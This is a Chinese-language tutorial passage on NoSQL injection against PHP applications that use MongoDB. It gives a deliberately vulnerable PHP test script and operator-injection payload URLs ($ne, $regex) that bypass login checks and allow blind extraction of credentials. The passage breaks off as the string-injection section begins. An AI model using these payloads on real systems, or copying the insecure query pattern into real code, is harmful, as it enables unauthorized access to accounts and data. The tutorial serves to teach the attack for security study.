0x00 安装
下载:http://dl.mongodb.org/dl/win32/x86_64
安装:http://www.runoob.com/mongodb/mongodb-window-install.html
0x01 MongoDB语法
我们先学习下MongoDB的使用,知己知彼,方能百战百胜,只有了解了对方,才能找寻弱点,一击击破
下面都是以PHP为例
数据库操作基本是增删改查,MongoDB的增删改查怎么个不是SQL呢,下面我们来看一下
<?php
$mongo = new mongoclient();// 连接默认主机和端口为:mongodb://localhost:27017
$db = $mongo->security; //选择数据库
$coll = $db->users; //选择集合(表)
$coll->save({'id':1,'name':'admin','passwd':'admin'}); //增,新增id=1,name=admin,passwd=admin的数据
$coll->insert({'id':1,'name':'admin','passwd':'admin'});//增,这个也是增
$coll->find({'id':1}); //查,查询id=1的数据
$coll->remove({'id':1}); //减,删除id=1的数据
$coll->update({'id':1},{'name':'superadmin'}); //改,将id=1的name改为supername
?>
大家通过上面应该可以察觉到数据传输是通过json承载的
说明:JSON 是一种轻量级的数据交换格式。它基于 ECMAScript 的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言,它易于人阅读和编写,同时也易于机器解析和生成,并能有效地提升网络传输效率。如:{\"firstName\": \"Brett\", \"lastName\": \"McLaughlin\"}
还有一种执行的方法,是直接执行字符串的
<?php
$mongo = new mongoclient();// 连接默认主机和端口为:mongodb://localhost:27017
$db = $mongo->security; //选择数据库(表)
$query = "db.users.save({'id':1})"; //增
$query = "db.users.insert({'id':1})"; //增
$query = "db.users.find({'id':1})"; //查
$query = "db.users.remove({'id':1})"; //减
$query = "db.users.update({'id':1},{'name','superadmin'})"; 改
$result = $db->execute($query);
?>
上面都是连接users表进行操作的。db.users.find({'id':1})这种其实是js的语句,最后通过execute($sql)执行sql操作,execute其实就是执行js语句
针对上面两种执行方式,有不同的注入攻击方式。
0x02 注入攻击
针对上面两种执行方式,分类两种攻击方式:操作符注入、字符串注入 ,详细介绍下注入原理前,先补充知识
比较条件操作符
"$lt", "$lte", "$gt", "$gte", "$ne"
对应于:"<","<=",">",">=","!="
正则操作符
$regex
实际运用
db.items.find({"name" :"admin", "password" : {$ne : "1"}})
#查询name=admin及password不等以1的数据
相当于SQL语句:select * from item where name='admin' and password != 1;
db.items.find({"name" :{'$regex':"^a"}})
#查询正则匹配字母a开头的数据
操作符注入
测试代码
<?php
$mongo = new mongoclient();// 连接默认主机和端口为:mongodb://localhost:27017
$db = $mongo->security; //选择数据库
$coll = $db->users; //选择集合(表)
$username = $_GET['username'];
$password = $_GET['password'];
$data = array(
'username' => $username,
'password' => $password
);
echo 'data_array->'.$data.PHP_EOL;
$coll->find($data); //查,查询id=1的数据
$count = $coll->count();
if($count > 0){
foreach($data as $key => $value){
echo $key.'->'.$value.PHP_EOL;
}
}else{
echo 'NOT FIND.';
}
?>
传入数据?username=test&password=test
输出:username->test password->test
传入的url为:
http://127.0.0.1/mongodb.php?username=test&password=test
执行了语句:
db.users.find({'username':'test','password':'test'});
如果传入参数如下:
http://127.0.0.1/mongodb.php?username[xxx]=test&password=test
则$username就变成了个数组了,我们可以做下试验
<?php
$username = $_GET['username'];
$password = $_GET['password'];
$data = array(
'username' => $username,
'password' => $password
);
foreach($data as $user => $value){
echo $user."->".$value.PHP_EOL;
}
?>
传入:http://127.0.0.1/mongodb.php?username[xxx]=test&password=test
输出:username->Array password->test
可以看出$username变成数组了
数组相当于:
$data = array(
'username'=>array('xxx'=>'test'),
'password'=>'test');
-->
$data={'username':{'xxx':'test'},'password':'test'}
这样MongoDB最后执行如下语句:
db.users.find({'username':{'xxx':'test'},'password':'test'});
利用此特性我们可以注入操作符("$lt", "$lte", "$gt", "$gte", "$ne"),完成一些意料之外的操作了
eg:http://127.0.0.1/mongodb.php?username[$ne]=test&password[$ne]=test
这样就可以查询到出test/test的账号密码了
上面传入的参数,相当于执行的MongoDB语句:
db.users.find({'username':{'$ne':'test'},'password':{'$ne':'test'}});
相当于sql语句:
select * from users where usrname != 'test' and password != 'test';
上面的例子是有回显的,那如果没有回显呢,我们传统SQL注入的这种情况就是盲注了,NoSql是否也有呢?有的。
利用上面介绍的正则操作符$regex
eg:http://127.0.0.1/mongodb.php?username[$regex]=^a&password[$regex]=^b
上面传入的参数,相当于执行的MongoDB语句:
db.users.find({'username':{'$regex':'^a'},'password':{'$regex':'^b'}});
意思是查询username以字符a开头及password以字符b开头的数据。^o^
字符串注入
这个就是利用execute方法执行js写的查询